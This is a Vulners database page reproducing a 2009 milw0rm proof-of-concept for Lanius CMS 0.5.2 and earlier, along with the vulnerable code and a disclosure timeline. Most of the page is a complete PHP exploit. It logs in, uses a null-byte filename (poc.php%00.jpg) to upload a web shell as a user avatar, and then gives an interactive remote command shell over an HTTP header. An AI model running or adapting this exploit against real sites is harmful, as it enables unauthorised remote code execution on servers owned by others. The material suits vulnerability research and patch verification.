Vulners
Lucene search
Lanius CMS <= 0.5.2 - Remote Arbitrary File Upload Exploit
<?php
/*
--------------------------------------------------------
Lanius CMS <= 0.5.2 Remote Arbitrary File Upload Exploit
--------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.laniuscms.org/
details..: this vulnerability affects all Drake CMS >= 0.4.6 and Lanius CMS <= 0.5.2 r1050
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /includes/upload.php (in_upload() function)
52. if ($file_sz > $max_sz )
53. return sprintf(_UPLOAD_TOO_BIG, convert_bytes($file_sz), convert_bytes($max_sz));
54.
55. $thy_name = basename(urldecode($_FILES[$elem]['name']));
56. if (isset($allowed_ext)) {
57. $ext = file_ext($thy_name);
58. if (($ext==='') || (!in_array($ext, $allowed_ext)))
59. return sprintf(_UPLOAD_DISALLOWED_EXT, implode(', ',$allowed_ext));
60. }
61. $orig_name = $thy_name;
[-] file_ext() function defined into /includes/functions.php
101. function file_ext($file)
102. {
103. $p = strrpos($file, '.');
104. if ($p===false)return '';
105. return strtolower(substr($file,$p+1));
106. }
Cause of the uploaded filename is passed to urldecode() function is possibile to inject a null
char to bypass the extension's check. This is possibile because strrpos() function, used into
file_ext() function, is binary-safe, so by passing a filename e.g. test.php%00.jpg this function
returns 'jpg', but the file will be saved as test.php by move_uploadad_file() function.
[-] Disclosure timeline:
[05/04/2009] - Bug discovered
[06/04/2009] - Vendor contacted
[06/04/2009] - Vendor replied
[07/04/2009] - Fix released: http://www.laniuscms.org/?option=content&id=81
[07/04/2009] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
socket_write($s, $packet, strlen($packet));
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
function login()
{
global $host, $path, $username, $password, $sid;
print "\n[-] Logging in with username '{$username}' and password '{$password}'\n";
$payload = "username={$username}&password={$password}&task=login";
$packet = "POST {$path}?option=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
$response = http_send($host, $packet);
preg_match("/PHPSESSID=([0-9a-f]{32})/i", $response, $match);
$sid = $match[1];
if (!preg_match("/Location: index.php/i", $response))
die("[-] Incorrect username/password\n");
}
function upload()
{
global $host, $path, $sid, $username, $password;
login();
$avatar = "media/forum/avatars/custom/poc.php";
$params = array('user_name' => $username,
'user_password_orig' => $password,
'user_email' => '[email protected]',
'btnsubmit' => 'Update',
'task' => 'update');
foreach ($params as $name => $value)
$payload .= "--o0oOo0o\r\nContent-Disposition: form-data; name=\"{$name}\"\r\n\r\n{$value}\r\n";
$payload .= "--o0oOo0o\r\nContent-Disposition: form-data; name=\"user_uploaded_avatar\"; filename=\"poc.php%00.jpg\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}?option=user HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet);
$packet = "GET {$path}{$avatar} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match('/200 OK/i', http_send($host, $packet)))
return $avatar;
die("[-] Upload failed\n");
}
print "\n+------------------------------------------------------------------+";
print "\n| Lanius CMS <= 0.5.2 Remote Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <path> <username> <password>\n";
print "\nExample....: php $argv[0] localhost / user pass";
print "\nExample....: php $argv[0] localhost /lanius/ user pass\n\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$username = $argv[3];
$password = $argv[4];
$path .= upload();
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nlanius-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed\n");
}
?>
# milw0rm.com [2009-04-07]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1